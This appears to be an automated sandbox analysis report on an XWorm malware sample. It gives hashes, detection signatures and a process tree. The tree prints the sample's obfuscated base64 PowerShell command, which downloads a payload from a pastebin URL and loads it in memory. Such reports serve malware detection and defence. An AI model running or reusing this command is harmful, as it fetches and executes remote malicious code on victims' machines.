Edit tour
Windows
Analysis Report
17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe
Overview
General Information
| Sample name: | 17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe |
| Analysis ID: | 1561343 |
| MD5: | 993cbace6afacb6cd1017cd01b44a87a |
| SHA1: | 1d94c0fc7c82998d5b1bdf9615fe009a39813239 |
| SHA256: | e5a7528468aa8b685bd0f5fb99e7242e074c759f2cbf427108c0f2709f8a39b2 |
| Tags: | base64-decodedexeuser-abuse_ch |
| Infos: |   |
 | |
Detection
XWorm
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (STR)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
17323410655ab7b4ebaf9794a98546bfa9f8606c523f625a9e251d1f6b244b39e491609f0a676.dat-decoded.exe (PID: 6636 cmdline: "C:\Users\ user\Deskt op\1732341 0655ab7b4e baf9794a98 546bfa9f86 06c523f625 a9e251d1f6 b244b39e49 1609f0a676 .dat-decod ed.exe" MD5: 993CBACE6AFACB6CD1017CD01B44A87A) 
wscript.exe (PID: 6864 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\jg lbwx.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6984 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $IuJUJJZz = 'WwBT?Hk ?cwB0?GU?b Q?u?E4?ZQB 0?C4?UwBl? HI?dgBp?GM ?ZQBQ?G8?a QBu?HQ?TQB h?G4?YQBn? GU?cgBd?Do ?OgBT?GU?Y wB1?HI?aQB 0?Hk?U?By? G8?d?Bv?GM ?bwBs?C??P Q?g?Fs?UwB 5?HM?d?Bl? G0?LgBO?GU ?d??u?FM?Z QBj?HU?cgB p?HQ?eQBQ? HI?bwB0?G8 ?YwBv?Gw?V ?B5?H??ZQB d?Do?OgBU? Gw?cw?x?DI ?Ow?k?EM?Q wBS?Gg?bQ? g?D0?I??n? Gg?d?B0?H? ?cw?6?C8?L wBw?GE?cwB 0?GU?YgBp? G4?LgBj?G8 ?bQ?v?HI?Y QB3?C8?QQB k?HY?OQBn? EI?S?Bh?Cc ?I??7?CQ?Z g?g?D0?I?? o?Fs?UwB5? HM?d?Bl?G0 ?LgBJ?E8?L gBQ?GE?d?B o?F0?Og?6? Ec?ZQB0?FQ ?ZQBt?H??U ?Bh?HQ?a?? o?Ck?I??r? C??JwBk?Gw ?b??w?DE?L gB0?Hg?d?? n?Ck?I??7? Ek?bgB2?G8 ?awBl?C0?V wBl?GI?UgB l?HE?dQBl? HM?d??g?C0 ?VQBS?Ek?I ??k?EM?QwB S?Gg?bQ?g? C0?TwB1?HQ ?RgBp?Gw?Z Q?g?CQ?Zg? g?C0?VQBz? GU?QgBh?HM ?aQBj?F??Y QBy?HM?aQB u?Gc?I??7? GM?bQBk?C4 ?ZQB4?GU?I ??v?GM?I?? 7?H??aQBu? Gc?I??x?DI ?Nw?u?D??L g?w?C4?MQ? g?Ds?c?Bv? Hc?ZQBy?HM ?a?Bl?Gw?b ??u?GU?e?B l?C??LQBj? G8?bQBt?GE ?bgBk?C??e w?k?GY?I?? 9?C??K?Bb? FM?eQBz?HQ ?ZQBt?C4?S QBP?C4?U?B h?HQ?a?Bd? Do?OgBH?GU ?d?BU?GU?b QBw?F??YQB 0?Gg?K??p? C??Kw?g?Cc ?Z?Bs?Gw?M ??x?C4?d?B 4?HQ?Jw?p? C??Ow?k?FE ?U?B0?GE?d g?g?D0?I?? o?C??RwBl? HQ?LQBD?G8 ?bgB0?GU?b gB0?C??LQB Q?GE?d?Bo? C??J?Bm?C? ?KQ?g?Ds?S QBu?HY?bwB r?GU?LQBX? GU?YgBS?GU ?cQB1?GU?c wB0?C??LQB V?FI?SQ?g? CQ?UQBQ?HQ ?YQB2?C??L QBP?HU?d?B G?Gk?b?Bl? C??J?Bm?C? ?LQBV?HM?Z QBC?GE?cwB p?GM?U?Bh? HI?cwBp?G4 ?ZwB9?C??O w?k?FE?U?B 0?GE?dg?g? D0?I??o?C? ?RwBl?HQ?L QBD?G8?bgB 0?GU?bgB0? C??LQBQ?GE ?d?Bo?C??J ?Bm?C??KQ? g?Ds?J?Bq? Hc?bgBn?GM ?I??9?C??J w?w?DE?Jw? g?Ds?J?Bl? GE?YQBp?Hc ?I??9?C??J w?l?Eo?awB R?GE?cwBE? GY?ZwBy?FQ ?Zw?l?Cc?I ??7?Fs?QgB 5?HQ?ZQBb? F0?XQ?g?CQ ?Z?Bj?Gg?c wBp?C??PQ? g?Fs?cwB5? HM?d?Bl?G0 ?LgBD?G8?b gB2?GU?cgB 0?F0?Og?6? EY?cgBv?G0 ?QgBh?HM?Z Q?2?DQ?UwB 0?HI?aQBu? Gc?K??g?CQ ?UQBQ?HQ?Y QB2?C4?cgB l?H??b?Bh? GM?ZQ?o?Cc ?J??k?CQ?J ??k?Cc?L?? n?EE?Jw?p? C??KQ?g?Ds ?WwBT?Hk?c wB0?GU?bQ? u?EE?c?Bw? EQ?bwBt?GE ?aQBu?F0?O g?6?EM?dQB y?HI?ZQBu? HQ?R?Bv?G0 ?YQBp?G4?L gBM?G8?YQB k?Cg?J?Bk? GM?a?Bz?Gk ?KQ?u?Ec?Z QB0?FQ?eQB w?GU?K??n? FQ?ZQBo?HU ?b?Bj?Gg?Z QBz?Fg?e?B Y?Hg?e??u? EM?b?Bh?HM ?cw?x?Cc?K Q?u?Ec?ZQB 0?E0?ZQB0? Gg?bwBk?Cg ?JwBN?HM?c QBC?Ek?YgB Z?Cc?KQ?u? Ek?bgB2?G8 ?awBl?Cg?J ?Bu?HU?b?B s?Cw?I?Bb? G8?YgBq?GU ?YwB0?Fs?X QBd?C??K?? n?DQ?Mg?x? DE?VgBP?E4 ?LwBu?Gk?Y QBt?C8?cwB k?GE?ZQBo? C8?cwBm?GU ?cg?v?GU?c gBp?GY?LwB h?Gw?b?Bp? HU?cQBu?GE ?cgBy?GE?Y g?0?DI?M?? y?G4?bwBp? H??bQBh?Gg ?Yw?v?G0?b wBj?C4?d?B u?GU?d?Bu? G8?YwBy?GU ?cwB1?GI?d QBo?HQ?aQB n?C4?dwBh? HI?Lw?v?Do ?cwBw?HQ?d ?Bo?Cc?I?? s?C??J?Bl? GE?YQBp?Hc ?I??s?C??J wBp?Gc?ZgB 4?EU?TQ?n? Cw?I??k?Go ?dwBu?Gc?Y w?s?C??Jw? x?Cc?L??g? Cc?UgBv?GQ ?YQ?n?C??K Q?p?Ds?';$ Yolopolhgg obek = [sy stem.Text.